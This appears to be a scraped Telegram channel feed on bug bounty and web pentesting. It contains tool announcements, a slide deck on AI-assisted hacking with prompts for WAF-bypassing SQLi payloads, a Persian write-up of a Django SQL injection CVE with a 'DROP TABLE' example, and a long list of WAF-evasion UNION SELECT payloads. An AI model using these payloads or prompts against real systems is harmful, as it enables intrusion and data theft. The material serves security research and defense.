RadvanSec – Telegram
RadvanSec
990 subscribers
181 photos
27 videos
143 files
595 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
Audio
Podcast about Web Cache Poisoning


⭐️ @Zerosec_team
4
🤣7👍1
Reflex is a powerful fuzzing tool for finding reflections, often leading to vulnerabilities like XSS. The latest update adds headless browser support. It scans a list of URLs, finds parameters, checks which ones are reflected, and with a custom wordlist you can boost the chance of discovering bugs.

Github-Repository: https://github.com/nexovir/reflix

#BugBounty #XSS #WebPentest #Hackerone

⭐️ @ZeroSec_team
🔥61
Autoswagger is a command-line tool designed to discover, parse, and test for unauthenticated endpoints using Swagger/OpenAPI documentation. It helps identify potential security issues in unprotected endpoints of APIs, such as PII leaks and common secret exposures.

https://github.com/intruder-io/autoswagger

⭐️ @Zerosec_team
3👍1
Oops

⭐️ @ZeroSec_team
🤣5😁42😈1🗿1
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 2 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
👍31
ماه هم گرفت ولی باگکراد دست از اسکم کردن برنداشت😞
🤣13👍1
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
RadvanSec
Web LLM Attack Playbook: How I Scored $5K on a Public Program💸 PHASE #0 - Recon Understand where LLM is used (like chatbot , summarizer , assistant ,…) naturally before any attacks we need to get a big picture about LLM for THREAT MODELING  PHASE #1 -…
I💥 AI Tools Hackers Are Using in 2025 (Red-Team & Blue-Team POV)

---

Slide 1 — Hook

AI isn’t just generating images anymore — it’s accelerating hacking.
From automated recon to payload crafting and even full pentest reporting, here’s how attackers (and defenders) are using AI in 2025 — with real examples & how to defend.

---

Slide 2 — WRAITH (AI-Powered Recon Automation)

What it does

Auto-discovers assets, subdomains, tech stack, open ports.

Prioritizes targets using LLM reasoning.

Generates recon → exploit hypotheses.

Example workflow

wraith --target example.com --out recon.json
# Feed recon.json to LLM:
“Suggest top 5 exploit paths from this recon. Rank by impact & ease.”

Why it’s scary: Recon that took hours now happens in minutes, with smarter prioritization.

---

Slide 3 — PentestGPT (LLM for Pentest Planning & Reporting)

Use-cases

Turn raw notes into a structured methodology (OWASP, PTES).

Suggest payloads per finding (SQLi, SSTI, XXE, etc.).

Generate executive + technical reports fast.

Example prompt

You are my senior pentester. Target: api.example.com
Stack: Node.js, GraphQL
Give me:
1) Attack surface checklist
2) High-probability vulns to test
3) Example payloads per vuln
4) Reporting template with risk ratings (CVSS)

---

Slide 4 — BurpGPT (Burp Suite + LLM Payload Brain)

What it does

Reads intercepted requests

Suggests custom payloads (WAF-aware, context-aware)

Helps craft polyglot, obfuscated, or blind-exploitation payloads

Example
Request:
POST /search {"q": "john"}
Prompt to BurpGPT:
“Generate 10 WAF-bypassing SQLi payloads for JSON body with parameter ‘q’. DB type unknown. Also give time-based blind variants.”

---

Slide 5 — X-Bow / Autonomous Pentest Engines

What they do

Chain recon → exploit → validate → write report

Can iterate on responses (e.g., WAF blocks)

Can run multi-step campaigns (dir brute force → SSRF → metadata steal → privilege escalation)

Example high-level flow (pseudo)

xbow --scope scope.txt
→ Asset discovery
→ LFI found → RCE candidate path suggested
→ Exploit validated
→ Draft report with PoC + risk score auto-generated

---

Slide 6 — ShellGPT / Terminal + AI = Lethal

Why it’s useful

Writes bash one-liners for recon, fuzzing, log triage

Summarizes verbose tool output (nmap, nuclei, logs)

Example prompt

I have a wordlist subdomains.txt and want to resolve only live subdomains to alive.txt using httpx. Write a one-liner and explain each flag.

Bonus: Ask it to “fix this exploit noscript that’s failing on Python 3.12” — instant debugging.

---

Slide 7 — AI-Driven Phishing & MFA Fatigue Campaigns (Defense POV)

Attackers use AI to

Clone writing styles from leaked emails

Auto-generate reverse proxy phishing kits (Evilginx2-like)

Craft localized, hyper-personalized lures

Automate MFA fatigue (“push bombing”) noscripts with social engineering noscripts

Defend with

FIDO2/WebAuthn (phish-resistant MFA)

Conditional access + impossible travel policies

User-behavior baselines + anomaly detection

---

Slide 8 — AI for Exploit Dev & Patch Diffing

Use-cases

Turn a PoC into a Metasploit module

Explain complex deserialization chains

Diff two versions of source code/binary and ask “What vuln was patched?”

Prompt example

Here’s a failing PoC for CVE-XXXX-YYYY. Fix it for Python 3.12, add argparse, and explain the root cause + exploitation path in comments.

---

Slide 9 — Blue-Team: How to Defend Against AI-Augmented Attackers

1. Phish-resistant MFA (FIDO2, hardware keys).

2. Attack surface monitoring — your own “Wraith” for blue team.

3. LLM-assisted log analysis (explain spikes, rare sequences, failed OAuth flows).

4. Prompt-hardened AI apps — sanitize model inputs, enforce allowlists.

5. Rate-limit & anomaly-detect AI-driven brute-force / fuzzing.

6. Automatic report diffing for repeated exploit vectors from bug bounty submissions.

---

Slide 10 — Ethics, Compliance & Reality

These tools can be weaponized.

Use only on assets you own or have written authorization for.

Always document consent, scope, and reporting responsibly.

⭐️ @ZeroSec_team
👍41
🔴 آسیب پذیری از نوع SQL injection با شناسه ی CVE-2025-57833 در جنگو اصلاح شده که امتیاز 7.1 و شدت بالا داره.

نسخه های تحت تاثیر:

- Django main
- Django 5.2
- Django 5.1
- Django 4.2

نسخه های اصلاح شده: نسخه های 4.2.24, 5.1.12, 5.2.6 و بالاتر

آسیب ‌پذیری در عملکرد FilteredRelation رخ میده و زمانی فعال میشه که به همراه expansionِ **kwargs در متدهای QuerySet.annotate یا QuerySet.alias استفاده بشه.

- تابع FilteredRelation یک قابلیت ORM در Django هست که امکان میده روی یک رابطه (مثل ForeignKey) شرط بزنیم. مثلا کد زیر فقط کامنتهای فعال هر پست میگیره:


qs = Post.objects.annotate(
active_comments=FilteredRelation("comments", condition=Q(comments__is_active=True))
)

- متد annotate برای اضافه کردن ستونهای محاسباتی (مثل count، sum) به کوئری استفاده میشه.

- متد alias دقیقاً مثل annotate هستش، ولی ستون جدید ایجاد نمیکنه، فقط یک اسم مستعار روی عبارت SQL میذاره.

مثلا در کد زیر num_comments یک alias برای COUNT(comments) میشه.


qs = Post.objects.annotate(num_comments=Count("comments"))


- در پایتون وقتی تابعی صدا زده میشه، میشه پارامترها رو مستقیم داد، یا اینکه از dict** استفاده کرد. در حالت مستقیم:


greet(name="onhexgroup", age=25)


بصورت dict** :


info = {"name": "onhexgroup", "age": 25}
greet(**info)

در این حالت پایتون محتویات دیکشنری رو بشکل keyword argument باز میکنه یعنی معادل این میشه:


greet(name="onhexgroup", age=25)


در جنگو هم اگه این داشته باشیم:


user_alias = "custom_label" # ورودی کاربر
qs = Order.objects.annotate(**{user_alias: F("payment__amount")})
print(str(qs.query))


خروجی SQL:


SELECT "myapp_order"."id",
"myapp_payment"."amount" AS "custom_label"
FROM "myapp_order"
LEFT OUTER JOIN "myapp_payment"
ON ("myapp_order"."id" = "myapp_payment"."order_id");


در جنگو همیشه alias داخل "" قرار میگیره اما در FilteredRelation وقتی alias از طریق kwargs وارد میشه، alias بصورت خام میره داخل SQL. بنابراین اگه مهاجم این ورودی رو بده:


user_alias = 'custom_label"; DROP TABLE users; --'
qs = Order.objects.annotate(**{user_alias: F("payment__amount")})
print(str(qs.query))

تبدیل میشه به :
‍‍

sql
SELECT "myapp_order"."id",
"myapp_payment"."amount" AS custom_label"; DROP TABLE users; --
FROM "myapp_order"


و در نتیجه SQLinjection فعال میشه.

اینجا میتونید رایت آپ کامل و POC این آسیب پذیری رو بررسی کنید.

#جنگو #پایتون
#Django #SQLInjection #SQLi

⭐️ @ZeroSec_team
8
Share your experience about WEB LLM ATTACKS with us via the channel's direct message.
2🔥2
Bypass SQL union select


/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+


#Bypass #SQL

⭐️ @ZeroSec_team
🔥21👍1👎1
Media is too big
VIEW IN TELEGRAM
REDACTED: $20,000 OAuth Bounty (FT.Nagli)

⭐️ @ZeroSec_team
3
Defender for Identity
(formerly known as Azure Advanced Threat Protection or AATP) is a Microsoft cloud security service that focuses on Active Directory (AD) and Azure AD. Its main purpose is to detect threats, attacks, and lateral movements within the network

⭐️ @ZeroSec_team
4
🔥32👏1
Forwarded from Hacking Articles
🚀 AI Penetration Training (Online) – Register Now! 🚀

🔗 Register here: https://forms.gle/bowpX9TGEs41GDG99
💬 WhatsApp: https://wa.me/message/HIOPPNENLOX6F1

📧 Email: info@ignitetechnologies.in

Limited slots available! Hurry up to secure your spot in this exclusive training program offered by Ignite Technologies.

🧠 LLM Architecture
🔐 LLM Security Principles
🗄 Data Security in AI Systems
🛡 Model Security
🏗 Infrastructure Security
📜 OWASP Top 10 for LLMs
⚙️ LLM Installation and Deployment
📡 Model Context Protocol (MCP)
🚀 Publishing Your Model Using Ollama
🔍 Introduction to Retrieval-Augmented Generation (RAG)
🌐 Making Your AI Application Public
📊 Types of Enumeration Using AI
🎯 Prompt Injection Attacks
🐞 Exploiting LLM APIs: Real-World Bug Scenarios
🔑 Password Leakage via AI Models
🎭 Indirect Prompt Injection Techniques
⚠️ Misconfigurations in LLM Deployments
👑 Exploitation of LLM APIs with Excessive Privileges
📝 Content Manipulation in LLM Outputs
📤 Data Extraction Attacks on LLMs
🔒 Securing AI Systems
🧾 System Prompts and Their Security Implications
🤖 Automated Penetration Testing with AI
6👍1